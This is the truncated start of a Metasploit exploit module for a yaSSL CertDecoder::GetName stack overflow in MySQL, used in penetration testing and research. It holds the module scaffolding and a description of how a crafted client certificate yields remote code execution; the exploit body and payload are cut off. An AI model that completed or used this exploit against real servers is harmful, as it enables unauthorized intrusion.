##
# $Id: mysql_yassl_getname.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
# Framework-defined reliability ranking constant for this module.
Rank = GoodRanking
# Mixin supplying the raw TCP client used to reach the target service
# (connection options and connect/disconnect helpers live there, not here).
include Msf::Exploit::Remote::Tcp
# Mixin supplying SEH-overwrite helpers; presumably used by the payload/
# exploit methods defined later in this class -- confirm against the
# remainder of the file.
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'MySQL yaSSL CertDecoder::GetName Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the yaSSL (1.9.8 and earlier)
implementation bundled with MySQL. By sending a specially crafted
client certificate, an attacker can execute arbitrary code.
This vulnerability is present within the CertDecoder::GetName function inside
"taocrypt/src/asn.cpp". However, the stack buffer that is written to exists
within a parent function's stack frame.
NOTE: This vulnerability requires a non-default configuration. First, the attacker
must be able to pass the host-based authentication. Next, the server must be
configured to listen on an accessible network interface. Lastly, the server
must have been manually configured to use